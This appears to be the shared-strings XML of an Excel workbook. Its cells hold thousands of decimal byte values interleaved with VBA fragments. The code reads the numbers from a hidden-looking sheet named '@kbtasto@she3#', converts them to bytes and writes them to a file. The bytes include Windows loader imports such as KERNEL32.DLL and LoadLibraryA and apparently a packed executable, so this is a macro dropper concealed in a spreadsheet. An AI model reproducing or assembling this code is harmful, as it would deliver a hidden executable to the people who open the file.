    <t xml:space="preserve">148 117 16 90 4 231 108 83 137 87 84 2 195 15 148 38 132 133 18 117 5 195 63 86 208 112 120 129 56 141 164 36 15 42 61 23 179 33 140 115 35 57 14 30 231 32 240 193 20 107 85 54 83 2 10 159 133 237 3 114 62 34 64 1 80 115 76 189 236 216 46 24 206 192 76 17 176 193 85 35 198 241 178 221 48 195 45 60 65 35 44 56 35 194 12 5 182 174 39 11 83 47 67 58 10 6 161 107 209 13 47 234 39 61 215 91 29 240 65 119 22 131 187 221 2 140 87 220 182 57 126 229 126 220 49 72 88 35 88 112 187 27 138 165 222 38 113 147 152 22 5 179 156 107 124 217 54 138 200 76 67 43 67 104 128 131 83 94 188 200 118 4 86 28 144 34 5 75 175 208 198 43 66 150 223 9 131 182 219 70 143 229 145 40 199 5 48 127 132 44 4 185 87 42 116 7 61 19 55 10 234 53 116 131 76 63 3 40 197 100 13 251 251 182 180 11 200 61 7 14 129 40 198 64 45 131 128 9 125 123 193 145 236 148 96 212 91 74 59 242 196 119 252 135 97 120 94 120 88 43 200 59 194 222 119 83 131 150 30 223 133 249 31 78 72 186 83 231 18 64 108 120 107 45 152 9 76 68 10 2 50 211 231 203 8 51 54 34 51 199 233 37 75 67 150 143 214 44 209 80 210 168 64 60 142 115 227 239 209 74 255 75 88 117 187 233 65 90 223 157 202 198 72 141 200 159 184 80 198 88 112 146 65 250 211 2 60 74 235 105 56 35 108 143 88 48 138 4 109 139 46 147 15 39 161 53 180 79 64 139 144 35 4 12 222 100 146 17 192 233 21 93 58 187 108 139 233 141 18 73 22 59 241 47 218 221 205 245 237 194 73 229 139 242 255 169 210 194 104 56 130 194 170 215 249 132 50 154 92 128 66 209 173 24 25 73 110 254 134 253 246 157 219 116 225 118 153 4 59 207 252 117 43 147 65 14 233 206 82 81 79 83 83 166 13 56 94 128 250 27 15 57 71 149 17 11 24 255 14 254 200 184 233 140 255 85 0 237 141 155 255 108 52 126 16 71 115 8 172 255 46 32 87 32 131 241 44 160 108 71 50 44 237 15 88 27 180 99 208 46 4 83 </t>
  </si>
  <si>
    <t xml:space="preserve">hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 5).Value</t>
  </si>
  <si>
    <t xml:space="preserve">1 0 0 0 2 0 0 0 3 0 0 0 4 0 0 0 5 0 0 0 6 0 0 0 7 0 0 0 8 0 0 0 9 0 0 0 10 0 0 0 11 0 0 0 12 0 0 0 13 0 0 0 14 0 0 0 15 0 0 0 16 0 0 0 17 0 0 0 18 0 0 0 19 0 0 0 20 0 0 0 21 0 0 0 22 0 0 0 23 0 0 0 24 0 0 0 25 0 0 0 26 0 0 0 27 0 0 0 28 0 0 0 29 0 0 0 30 0 0 0 31 0 0 0 32 0 0 0 33 0 0 0 34 0 0 0 35 0 0 0 36 0 0 0 37 0 0 0 38 0 0 0 39 0 0 0 40 0 0 0 41 0 0 0 42 0 0 0 43 0 0 0 44 0 0 0 45 0 0 0 46 0 0 0 47 0 0 0 254 255 255 255 49 0 0 0 50 0 0 0 51 0 0 0 52 0 0 0 53 0 0 0 54 0 0 0 55 0 0 0 56 0 0 0 57 0 0 0 58 0 0 0 254 255 255 255 60 0 0 0 254 255 255 255 62 0 0 0 63 0 0 0 64 0 0 0 65 0 0 0 66 0 0 0 254 255 255 255 68 0 0 0 69 0 0 0 70 0 0 0 71 0 0 0 72 0 0 0 73 0 0 0 74 0 0 0 75 0 0 0 76 0 0 0 77 0 0 0 78 0 0 0 79 0 0 0 80 0 0 0 81 0 0 0 82 0 0 0 83 0 0 0 84 0 0 0 85 0 0 0 86 0 0 0 87 0 0 0 88 0 0 0 89 0 0 0 90 0 0 0 91 0 0 0 92 0 0 0 93 0 0 0 94 0 0 0 95 0 0 0 96 0 0 0 97 0 0 0 98 0 0 0 99 0 0 0 100 0 0 0 101 0 0 0 102 0 0 0 103 0 0 0 104 0 0 0 105 0 0 0 106 0 0 0 107 0 0 0 108 0 0 0 109 0 0 0 110 0 0 0 111 0 0 0 112 0 0 0 113 0 0 0 114 0 0 0 115 0 0 0 116 0 0 0 117 0 0 0 118 0 0 0 119 0 0 0 120 0 0 0 121 0 0 0 254 255 255 255 123 0 0 0 124 0 0 0 125 0 0 0 126 0 0 0 127 0 0 0 128 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">127 101 115 85 110 104 112 100 161 32 191 231 28 208 112 10 30 25 60 77 111 185 5 104 236 100 117 108 114 78 68 65 148 64 79 6 212 181 69 6 83 116 114 123 55 133 45 204 115 24 87 180 105 100 101 67 98 155 221 1 125 114 84 111 77 200 66 121 116 246 44 136 13 97 43 22 87 179 221 43 64 79 21 67 111 244 39 28 100 215 186 207 102 18 228 111 109 109 13 76 47 164 240 151 160 177 30 97 235 112 73 110 102 111 65 208 217 173 157 45 68 253 79 111 121 12 67 16 11 250 74 24 135 86 17 146 149 11 159 139 82 116 108 12 119 105 23 131 21 94 16 97 49 101 12 83 179 195 44 97 123 72 32 119 61 214 198 222 67 80 114 10 65 11 7 79 69 77 52 194 31 130 9 131 65 100 100 114 135 76 117 51 160 6 246 209 58 83 66 18 38 252 249 100 79 102 200 41 52 9 109 55 132 62 48 67 77 134 19 241 130 77 216 65 13 87 241 11 97 0 66 246 120 65 15 204 240 82 209 246 158 69 3 76 128 27 156 227 6 240 31 70 144 224 0 15 1 11 1 6 8 58 3 120 54 48 19 125 23 80 96 18 224 102 175 153 11 3 247 128 201 54 108 7 23 144 130 101 103 147 183 12 16 7 170 4 28 50 174 20 100 83 100 93 128 16 166 167 176 30 95 176 205 15 46 116 101 120 116 118 66 144 235 16 134 104 115 97 69 32 46 114 40 178 37 76 110 83 212 7 3 2 105 110 177 230 64 46 38 39 200 27 112 38 96 74 6 112 192 12 0 80 2 186 236 243 164 4 0 0 0 0 0 0 0 72 255 0 0 0 0 0 0 0 96 190 0 128 64 0 141 190 0 144 255 255 87 131 205 255 235 16 144 144 144 144 144 144 138 6 70 136 7 71 1 219 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t>
  </si>
  <si>
    <t xml:space="preserve">112 48 187 115 32 125 129 237 88 116 86 18 120 53 59 200 115 77 28 100 233 124 200 213 60 57 179 27 85 177 212 164 167 5 119 31 57 123 19 221 168 223 125 229 17 99 43 75 104 129 249 0 90 118 3 183 102 100 201 87 66 112 112 57 50 15 135 240 143 255 189 103 219 97 108 138 75 112 139 187 31 141 116 2 253 211 140 166 173 66 159 194 81 92 23 87 114 50 72 83 72 88 87 187 58 237 246 76 17 187 74 132 59 250 155 163 27 163 29 103 192 185 93 248 189 43 248 214 35 176 128 228 254 168 112 141 100 178 132 77 47 184 226 81 209 59 214 13 119 59 138 169 100 74 24 107 135 197 179 84 120 183 255 254 117 179 76 227 82 96 103 195 153 166 89 2 88 219 230 212 228 4 150 83 210 213 194 203 198 32 163 31 135 216 201 173 125 180 24 35 93 217 86 55 159 2 72 31 233 202 196 138 68 17 255 152 38 156 38 157 146 158 152 11 154 116 144 154 151 71 126 137 187 159 210 37 158 67 154 131 73 236 117 47 124 141 244 107 20 147 108 66 195 11 44 118 69 114 150 138 99 93 249 28 110 155 92 120 108 65 72 1 96 1 56 108 25 172 7 235 216 91 172 195 116 76 87 68 2 255 88 200 33 93 8 191 66 147 69 25 4 33 102 231 116 100 112 201 17 93 232 93 208 142 12 152 234 79 4 95 250 173 6 188 46 86 116 98 6 200 116 91 57 72 32 217 26 240 86 110 4 36 116 81 41 2 8 250 219 119 99 24 196 44 2 154 86 12 86 16 57 78 24 137 136 173 149 150 129 125 62 7 16 24 171 182 253 38 137 131 226 71 131 194 42 26 4 39 247 216 236 106 27 86 26 32 46 117 140 139 214 50 122 212 190 234 172 133 189 198 182 26 29 216 127 28 211 209 86 205 166 26 180 112 36 133 247 1 13 174 173 184 169 32 178 138 0 58 194 231 108 74 103 109 151 131 48 56 10 220 119 20 5 71 255 127 218 38 196 176 87 32 137 87 24 117 10 199 71 32 96 141 80 152 91 161 109 87 40 17 36 248 14 36 128 6 136 6 13 40 24 111 13 174 152 169 104 97 70 16 220 91 169 251 253 32 59 218 125 7 189 166 </t>
  </si>
  <si>
    <t xml:space="preserve">n = 1</t>
  </si>
  <si>
    <t xml:space="preserve">1 22 1 0 6 0 1 0 0 124 7 0 0 228 0 0 0 40 3 0 0 244 8 0 0 2 9 0 0 122 10 0 0 0 0 0 0 1 0 0 0 118 117 148 62 0 0 255 255 35 0 0 0 136 0 0 0 182 0 255 255 1 1 0 0 0 0 255 255 255 255 0 0 0 0 255 255 64 0 255 255 0 0 125 11 180 57 181 125 97 76 169 75 57 57 134 51 32 116 25 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 254 124 78 192 108 34 191 76 136 243 12 48 73 15 20 198 16 0 0 0 3 0 0 0 5 0 0 0 7 0 0 0 255 255 255 255 255 255 255 255 1 1 8 0 0 0 255 255 255 255 120 0 0 0 8 254 124 78 192 108 34 191 76 136 243 12 48 73 15 20 198 125 11 180 57 181 125 97 76 169 75 57 57 134 51 32 116 255 255 0 0 0 0 77 69 0 0 255 255 255 255 255 255 0 0 0 0 255 255 0 0 0 0 255 255 1 1 0 0 0 0 223 0 255 255 0 0 0 0 80 0 255 255 255 255 255 255 1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64 1 0 0 2 0 91 76 255 255 255 255 0 0 1 0 83 16 255 255 255 255 0 0 1 0 83 148 255 255 255 255 0 0 1 0 184 34 255 255 24 2 0 0 0 0 62 34 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 </t>
  </si>
  <si>
    <t xml:space="preserve">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24 0 0 0 138 7 71 44 232 60 1 119 247 128 63 3 117 242 139 7 138 95 4 102 193 232 8 193 192 16 134 196 41 248 128 235 232 1 240 137 7 131 199 5 137 216 226 217 141 190 0 128 0 0 139 7 9 192 116 60 139 95 4 141 132 48 0 176 0 0 1 243 80 131 199 8 255 150 40 176 0 0 149 138 7 71 8 192 116 220 137 249 87 72 242 174 85 255 150 44 176 0 0 9 192 116 7 137 3 131 195 4 235 225 255 150 48 176 0 0 97 233 169 102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47 219 124 36 255 101 140 223 242 236 159 117 248 9 15 143 108 110 28 8 97 10 251 246 181 124 182 9 28 88 251 15 79 113 202 45 149 232 53 207 71 249 62 145 34 237 44 159 173 185 20 50 248 2 41 139 130 86 106 195 104 184 214 106 1 217 165 93 213 131 142 125 12 18 210 137 185 31 51 245 119 28 137 110 131 130 211 229 137 94 40 148 10 99 255 27 163 75 7 141 69 255 137 70 44 184 22 224 65 187 53 40 22 188 193 187 17 68 72 3 21 182 191 125 76 184 171 170 0 247 225 209 234 137 62 60 36 105 241 90 189 47 211 79 40 85 81 90 55 36 238 249 53 46 74 71 40 26 15 78 68 56 128 58 216 182 189 81 122 10 60 90 6 84 106 4 111 204 157 54 81 134 36 45 44 142 12 66 109 219 227 141 20 141 119 84 12 76 48 60 11 118 108 165 212 52 8 211 86 56 11 109 57 154 109 69 6 60 62 229 222 209 92 98 163 173 127 44 80 33 72 110 137 150 135 199 101 115 225 251 84 137 142 217 92 17 63 208 182 87 180 124 23 111 198 70 29 155 225 63 118 121 95 140 116 194 32 0 161 120 207 30 71 43 13 240 130 24 217 136 252 25 8 50 32 223 11 254 250 216 5 3 44 239 237 8 81 249 5 237 13 124 8 106 15 3 245 96 12 123 53 33 192 207 12 230 49 198 210 49 96 207 58 193 239 24 246 37 160 4 52 194 95 4 94 114 123 247 221 255 226 24 133 219 15 134 238 16 85 129 251 176 21 191 195 114 5 184 8 31 168 176 240 43 216 196 16 205 208 208 193 105 70 255 141 234 191 234 247 221 193 229 4 3 197 15 185 131 140 125 187 46 3 205 4 110 1 3 249 7 2 3 12 50 200 32 4 5 6 50 200 32 131 7 8 9 200 32 131 12 10 11 12 59 131 12 50 13 14 15 3 142 50 108 124 131 198 16 74 154 119 37 182 187 224 237 221 141 73 143 22 3 202 70 24 72 117 245 178 185 241 74 188 91 148 255 142 199 191 8 49 173 187 180 221 17 247 247 234 139 49 135 20 51 93 23 175 39 28 254 91 193 224 16 95 11 193 7 47 141 130 133 163 192 6 232 185 30 1 236 139 255 </t>
  </si>
  <si>
    <t xml:space="preserve">m = InStr(hv, " ")</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 16 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 148 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 26 76 255 255 255 255 0 0 0 0 2 60 84 0 255 255 0 0 0 0 2 60 88 0 255 255 0 0 0 0 2 60 92 0 255 255 0 0 0 0 2 60 96 0 255 255 0 0 0 0 2 60 100 0 255 255 0 0 0 0 2 60 104 0 255 255 0 0 0 0 2 60 108 0 255 255 0 0 0 0 2 60 112 0 255 255 0 0 0 0 2 60 116 0 255 255 0 0 0 0 2 60 120 0 255 255 0 0 0 0 2 60 124 0 255 255 0 0 0 0 2 60 255 255 255 255 0 0 255 255 1 1 0 0 0 0 1 0 78 0 48 0 123 0 48 0 48 0 48 0 50 0 48 0 56 0 49 0 57 0 45 0 48 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 45 0 67 0 48 0 48 0 48 0 45 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 48 0 52 0 54 0 125 0 7 0 0 0 160 2 0 0 1 1 200 3 0 0 144 0 0 0 255 255 255 255 255 255 255 255 32 0 0 0 29 0 16 0 37 0 0 0 29 0 12 0 37 0 0 0 12 17 26 2 255 255 255 255 0 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 16 1 0 0 28 255 111 0 255 255 255 255 255 255 255 255 20 3 0 0 10 0 10 0 1 0 148 0 0 1 0 0 2 128 254 255 255 255 255 255 16 0 255 255 136 0 0 0 2 1 255 255 96 0 0 0 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 29 0 0 0 37 0 0 0 34 160 22 2 255 255 255 255 52 0 255 255 24 0 0 0 0 0 0 0 0 0 3 64 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 2 131 254 255 255 255 255 255 8 0 255 255 16 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 56 192 0 0 40 192 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 68 192 0 0 82 192 0 0 98 192 0 0 0 0 0 0 75 69 82 78 69 76 51 50 46 68 76 76 0 0 76 111 97 100 76 105 98 114 97 114 121 65 0 0 71 101 116 80 114 111 99 65 100 100 114 101 115 115 0 0 69 120 105 116 80 114 111 99 101 115 11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51 3 96 238 220 126 192 4 73 117 247 23 128 9 28 19 202 15 164 57 116 10 19 137 178 164 22 141 21 25 217 5 160 168 209 199 66 136 230 160 88 228 86 255 30 181 85 96 81 8 85 0 176 105 199 187 0 166 172 176 84 11 130 12 54 87 212 45 53 96 137 215 61 149 91 125 6 103 115 111 162 180 136 88 23 30 136 147 221 183 254 237 20 183 3 28 175 102 59 211 114 18 226 138 148 6 80 66 58 135 61 193 223 148 40 6 119 1 65 17 180 42 175 115 178 252 52 183 45 117 16 40 6 204 206 91 227 118 43 69 115 137 180 144 135 251 208 109 71 29 209 225 124 126 139 88 94 137 112 33 221 187 49 180 89 195 42 15 144 69 192 222 217 137 170 94 11 207 176 81 128 70 206 227 82 24 228 156 235 90 26 76 24 12 6 19 134 74 241 46 68 139 40 9 93 129 46 129 105 248 87 141 186 52 11 58 8 41 130 76 150 11 241 238 123 139 140 130 81 52 139 2 138 171 237 182 248 19 65 156 61 12 137 116 73 183 189 143 30 163 16 113 141 148 1 108 138 44 81 166 95 83 118 184 33 43 193 132 231 182 190 174 177 98 28 186 139 142 183 71 4 161 29 1 127 131 2 64 59 198 126 11 1 71 139 112 183 43 108 93 6 59 31 36 175 29 127 76 21 70 133 215 69 40 92 66 140 238 65 212 45 220 219 124 39 241 43 247 21 7 52 183 92 10 216 192 115 81 198 31 1 130 104 111 23 58 205 138 116 24 18 76 141 2 174 141 45 177 125 226 3 206 25 207 73 137 12 139 104 181 92 204 160 118 130 168 17 58 153 141 119 71 142 155 111 180 142 223 31 140 85 141 126 255 141 180 114 111 235 3 175 20 235 222 27 129 102 131 188 126 25 140 7 22 218 150 160 154 59 72 21 57 195 246 215 108 109 214 154 19 13 162 54 2 73 176 107 208 183 20 14 131 232 2 128 11 127 191 218 125 53 11 119 24 127 179 116 113 183 54 8 63 248 80 222 47 116 96 75 141 172 84 87 120 137 186 209 28 189 79 131 237 142 10 89 184 195 64 59 232 95 44 127 56 32 124 253 110 43 116 59 249 212 5 116 59 4 131 139 233 43 239 </t>
  </si>
  <si>
    <t xml:space="preserve">Do While m &gt; 0</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 255 255 255 255 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 130 160 18 2 255 255 255 255 254 255 255 255 8 1 0 0 2 0 255 255 254 255 255 255 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 29 0 16 0 37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00 1 0 0 40 2 0 0 255 255 255 255 248 1 0 0 255 255 255 255 136 2 0 0 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 176 1 0 0 255 255 255 255 255 255 255 255 28 2 22 2 46 2 255 255 255 255 255 255 255 255 255 255 3 0 255 255 64 4 254 255 224 1 0 0 120 255 255 255 9 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 112 2 0 0 116 255 255 255 9 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 16 2 0 0 100 255 255 255 12 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 64 2 0 0 84 255 255 255 12 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 255 255 255 255 68 255 255 255 12 0 255 255 32 0 0 0 255 255 255 255 64 4 254 255 88 2 0 0 52 255 255 255 12 0 255 255 32 0 0 0 104 1 0 0 64 4 254 255 255 255 255 255 36 255 255 255 12 0 255 255 32 0 0 0 80 1 0 0 64 4 254 255 255 255 255 255 32 255 255 255 9 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 255 255 255 255 28 255 255 255 3 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 24 1 0 0 0 255 255 255 12 0 255 255 32 0 0 0 0 0 0 0 24 3 0 0 16 0 0 0 252 254 255 255 9 0 255 255 32 0 </t>
  </si>
  <si>
    <t xml:space="preserve">94 183 20 185 242 232 139 230 139 37 137 11 168 92 235 58 225 14 80 24 218 4 223 118 87 104 98 117 182 110 73 131 238 138 201 120 117 177 48 198 170 133 136 32 223 66 133 250 214 217 87 87 120 2 131 205 115 60 190 157 169 249 139 217 185 7 186 10 233 185 138 11 3 82 181 161 100 148 247 152 6 127 173 111 233 212 140 103 75 6 222 67 239 255 37 110 135 199 184 64 63 70 139 125 4 59 199 116 110 59 242 223 244 233 127 242 125 10 102 1 180 129 126 235 46 250 21 59 197 116 8 255 187 197 12 200 17 7 129 180 24 21 131 254 10 127 9 198 76 247 116 13 184 7 8 188 133 232 116 237 101 37 7 123 235 26 87 15 6 77 135 101 147 10 163 112 216 75 203 56 23 122 141 174 110 255 242 11 241 17 31 239 12 130 24 132 249 0 223 26 110 166 79 2 249 16 98 131 203 255 57 205 109 8 107 73 235 237 228 198 4 199 172 118 13 195 6 69 141 40 62 235 6 95 30 174 51 221 237 20 81 16 241 173 209 220 133 31 91 125 8 59 148 132 120 51 253 221 91 176 183 255 167 163 47 43 188 168 118 213 139 183 166 79 238 136 180 22 94 33 43 215 191 92 24 180 168 233 241 166 159 116 214 211 226 125 102 9 144 176 167 247 34 51 246 119 138 152 8 136 28 17 11 177 106 189 27 100 13 219 80 8 20 5 252 223 197 215 9 74 65 237 177 16 42 202 102 211 238 141 76 58 240 182 181 139 45 253 176 63 140 235 20 81 148 91 139 125 176 45 27 226 87 3 207 78 137 129 173 208 142 204 194 39 102 16 108 114 129 109 95 52 118 153 38 235 7 148 174 50 128 240 17 183 184 182 65 91 112 47 8 225 176 180 64 19 102 34 44 180 65 72 63 201 253 67 14 81 0 176 39 68 126 88 116 71 8 22 187 130 242 137 19 121 143 211 230 211 103 232 108 82 176 77 16 108 34 35 108 16 48 248 111 242 164 184 21 33 3 194 186 10 5 184 68 32 7 200 184 13 233 34 19 201 243 3 241 190 228 138 144 3 188 188 64 6 89 166 245 9 85 128 157 144 9 247 235 18 238 3 166 160 217 7 104 137 7 74 33 67 114 201 </t>
  </si>
  <si>
    <t xml:space="preserve">buf = CByte(Mid(hv, n, m - n))</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 64 4 254 255 16 0 0 0 236 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 220 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 204 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 96 3 0 0 16 0 0 0 200 254 255 255 9 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 184 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 168 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 64 0 0 0 152 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 136 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 120 254 255 255 12 0 255 255 32 0 0 0 0 0 0 0 64 4 254 255 16 0 0 0 116 254 255 255 3 0 255 255 32 0 0 0 0 0 0 0 255 255 255 255 56 0 0 0 1 0 1 0 1 0 1 0 0 0 0 0 0 0 0 0 32 0 0 0 255 255 255 255 144 0 0 0 96 0 0 0 255 255 255 255 255 255 255 255 32 0 0 0 255 255 255 255 144 0 0 0 96 0 0 0 255 255 255 255 255 255 255 255 255 255 255 255 224 0 0 0 184 0 0 0 0 0 0 0 0 0 0 0 68 0 4 0 0 0 0 0 24 3 20 3 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 255 12 0 4 0 0 0 0 0 152 215 66 66 4 0 1 36 0 42 0 92 0 82 0 102 0 102 0 102 0 102 0 42 0 48 0 58 0 52 0 51 0 49 0 55 0 49 0 50 0 50 0 55 0 1 36 0 42 0 92 0 82 0 102 0 102 0 102 0 102 0 42 0 48 0 49 0 52 0 51 0 49 0 55 0 49 0 50 0 97 0 55 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 </t>
  </si>
  <si>
    <t xml:space="preserve">139 221 233 116 223 5 133 143 228 131 197 4 79 137 11 137 153 154 92 192 15 78 251 207 209 22 11 18 31 95 209 11 197 229 129 3 13 25 20 126 103 173 205 28 253 220 129 198 255 218 225 63 29 148 189 89 176 28 229 226 208 229 11 153 176 110 82 28 233 245 73 56 221 6 226 84 102 194 97 216 39 155 108 243 5 153 126 96 141 115 134 51 144 61 81 21 141 83 127 12 35 153 8 100 117 252 244 6 158 12 200 85 252 4 51 255 140 23 65 42 194 142 163 215 188 127 27 95 106 176 149 13 56 151 28 192 64 130 93 10 155 100 7 56 144 118 20 157 57 56 144 148 124 235 27 57 241 201 128 141 92 102 159 3 71 59 253 127 66 15 45 22 109 45 92 75 73 81 141 136 140 200 237 99 0 67 103 188 75 83 12 128 9 126 124 52 34 211 117 195 111 144 152 130 111 241 124 236 12 20 107 51 201 133 210 91 16 106 85 54 1 95 31 156 11 182 133 48 219 74 9 144 105 49 123 84 248 52 17 65 8 154 250 75 224 17 170 196 132 124 179 2 251 72 205 9 151 95 52 179 162 8 16 143 45 176 186 84 140 16 8 13 172 166 118 111 114 135 150 179 4 77 152 98 139 20 154 150 30 209 147 241 226 177 166 6 114 187 141 223 59 203 4 138 110 71 3 111 137 220 126 102 30 151 235 168 172 15 196 215 41 239 5 44 156 38 252 141 84 10 240 163 59 167 184 108 219 172 140 30 101 37 231 97 184 122 48 154 139 133 168 202 60 149 224 191 133 135 141 165 133 170 32 108 125 168 52 149 34 107 74 226 40 200 64 68 84 208 91 9 132 55 89 64 207 11 3 253 176 36 143 77 129 253 0 147 183 122 197 66 9 66 189 61 254 213 193 11 157 217 138 234 60 186 230 36 53 84 155 240 200 217 185 2 156 190 242 59 206 79 246 67 8 176 157 29 52 186 168 83 235 58 108 73 20 178 26 255 36 106 124 16 46 123 52 190 102 187 202 75 52 189 88 191 67 242 179 208 246 71 129 44 189 160 214 18 14 163 53 88 208 140 20 75 154 229 146 3 20 237 50 168 65 70 182 65 229 143 168 206 212 130 207 77 25 59 136 152 130 191 150 231 </t>
  </si>
  <si>
    <t xml:space="preserve">Put #1, , buf</t>
  </si>
  <si>
    <t xml:space="preserve">0 42 0 35 0 101 0 57 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 49 0 97 0 99 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 49 0 97 0 100 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 100 0 102 0 1 18 0 42 0 92 0 82 0 49 0 42 0 35 0 50 0 56 0 53 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 99 0 101 0 1 16 0 42 0 92 0 82 0 49 0 42 0 35 0 101 0 57 0 223 1 0 0 0 0 0 255 255 255 255 56 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 254 202 1 0 11 0 0 128 8 0 8 0 0 0 0 0 0 0 34 129 8 0 6 0 2 0 8 0 0 0 0 129 8 0 4 0 5 0 16 0 0 0 0 129 8 0 30 0 73 0 120 0 0 0 0 129 8 0 10 0 24 0 24 0 0 0 0 129 8 0 14 0 34 0 40 0 0 0 0 129 8 0 16 0 42 0 56 0 0 0 0 129 8 0 10 0 43 0 72 0 0 0 0 129 8 0 2 0 2 0 88 0 0 0 0 128 9 0 0 0 0 0 255 255 255 255 4 129 8 0 2 0 3 0 96 0 0 0 255 255 255 255 1 1 168 0 0 0 93 0 242 4 144 0 0 0 150 4 32 0 0 0 0 0 201 4 0 0 104 0 0 0 183 0 32 0 28 2 40 0 30 2 110 0 0 0 0 0 237 0 32 0 28 2 </t>
  </si>
  <si>
    <t xml:space="preserve">118 37 47 29 187 2 4 120 23 179 0 186 5 50 73 36 32 28 139 72 252 61 102 152 234 138 144 164 136 20 41 45 108 73 120 71 95 132 55 123 147 12 204 66 233 234 77 172 102 179 133 188 68 66 147 0 4 52 219 36 131 116 45 139 136 144 20 145 176 110 119 164 160 223 129 164 6 3 194 15 156 8 67 14 57 228 152 148 144 247 214 0 152 140 220 87 13 141 145 168 12 104 189 77 96 191 121 47 27 26 3 243 215 12 97 110 151 4 117 245 24 140 2 224 250 111 63 249 21 195 193 238 2 59 198 26 192 254 192 94 136 65 28 141 168 19 246 163 0 51 192 9 47 248 214 255 131 230 1 11 198 209 233 209 224 74 172 127 240 209 232 18 48 225 23 18 63 16 83 117 56 73 104 61 133 60 118 72 255 64 20 242 111 109 194 89 46 136 6 114 61 8 124 52 239 214 64 112 51 137 55 182 136 59 11 156 5 115 19 45 105 66 127 248 62 178 13 115 78 58 127 144 250 8 83 126 247 2 165 72 63 209 126 20 31 205 182 4 51 61 241 20 41 50 94 13 21 46 100 40 239 235 217 110 241 218 192 139 250 214 116 140 143 147 199 128 216 99 23 28 189 24 116 59 38 102 125 182 31 179 8 44 136 60 12 112 70 137 118 63 216 191 6 138 203 246 209 136 12 22 16 139 203 247 209 137 107 44 22 15 204 12 111 133 219 116 33 175 56 195 138 193 238 206 189 31 71 41 11 70 71 75 40 117 226 17 93 35 161 69 160 14 4 238 16 229 237 2 164 130 16 11 226 11 127 176 20 153 40 174 138 131 199 130 24 243 221 16 116 13 36 70 138 28 11 15 36 108 166 217 76 56 9 48 76 233 130 129 97 237 140 130 22 210 232 154 138 6 182 99 140 111 254 141 165 83 20 182 28 6 51 143 236 240 246 127 227 141 52 66 77 116 52 4 102 3 241 209 230 139 206 71 76 68 4 215 13 189 80 144 15 126 230 176 219 124 39 201 186 161 182 98 183 2 130 25 131 68 84 4 181 193 181 133 39 64 36 8 66 115 236 190 19 252 11 133 183 70 59 243 126 217 94 136 95 8 88 104 64 3 194 163 102 56 224 5 10 133 146 14 26 24 </t>
  </si>
  <si>
    <t xml:space="preserve">n = m + 1</t>
  </si>
  <si>
